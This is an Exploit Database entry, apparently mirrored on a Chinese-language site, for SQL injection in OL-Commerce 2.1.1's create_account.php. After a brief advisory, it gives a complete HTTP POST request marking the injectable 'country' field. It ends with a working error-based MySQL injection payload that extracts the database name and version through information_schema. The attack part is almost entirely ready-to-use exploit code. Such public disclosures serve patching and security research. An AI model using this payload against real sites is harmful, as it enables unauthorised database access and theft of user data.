OL-Commerce – ‘/OL-Commerce/create_account.php?country’ SQL Injection

• Exploit Database
• 18 阅读

• 作者： AtT4CKxT3rR0r1ST
  日期： 2014-07-17
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/39345/

• source: https://www.securityfocus.com/bid/68719/info
  
  ol-commerce is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
  
  Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
  
  ol-commerce 2.1.1 is vulnerable; other versions may also be affected. 
  
  http://www.example.com/OL-Commerce/create_account.php
  
  POST /OL-Commerce/create_account.phpHTTP/1.1
  Host: www.example.com
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101
  Firefox/26.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: http://www.example.com/OL-Commerce/create_account.php
  Cookie:
  Connection: keep-alive
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 301
  
  
  action=process&gender=m&firstname=aaaaa&lastname=bbbb
  &dob=17.05.1991&email_address=email@hotmail.com
  &company=ccc&vat=1234&street_address=dddd&suburb=eeee
  &postcode=00961&city=fffff&state=gggggg
  &country=118[SQL
  INJECTION]&telephone=45345325&fax=234234&password=12121212&confirmation=12121212&x=28&y=4
  
  [NOTE]
  ------
  country=118[SQL INJECTION]=118' and (select 1 from (select
  count(*),concat((select(select
  concat(cast(concat(database(),0x3a,version()) as char),0x7e)) from
  information_schema.tables limit 0,1),floor(rand(0)*2))x from
  information_schema.tables group by x)a) and 1=1-- -